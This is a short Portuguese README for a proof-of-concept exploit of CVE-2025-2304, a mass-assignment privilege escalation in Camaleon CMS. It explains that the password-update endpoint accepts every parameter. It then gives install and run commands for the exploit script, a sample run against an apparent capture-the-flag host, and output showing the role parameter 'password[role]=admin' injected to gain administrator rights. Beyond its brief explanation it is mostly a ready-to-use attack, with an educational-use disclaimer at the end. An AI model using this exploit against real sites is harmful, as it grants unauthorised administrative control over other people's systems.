
PoC para CVE-2025-2304 Escalonamento de Privilégios no Camaleon CMS
Camaleon CMS Vulnerável a Escalação de Privilégio através de uma Atribuição em Massa
Existe uma Escalação de Privilégio através de uma Atribuição em Massa no Camaleon CMS
Quando um usuário deseja alterar sua senha, o método 'updated_ajax' do UsersController é chamado. A vulnerabilidade decorre do uso do método perigoso permit!, que permite que todos os parâmetros passem sem qualquer filtragem.
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - URL base da aplicação vulnerável-u - Nome de usuário para autenticação-p - Senha para autenticaçãopython exploit.py --url http://facts.htb -u krrish -p krrish
Saída:
[*] Autenticando como krrish...
[*] Explorando...
[+] Explorado! Você agora é admin
password[role]=admin injetadoEsta ferramenta é destinada apenas para fins educacionais e testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal.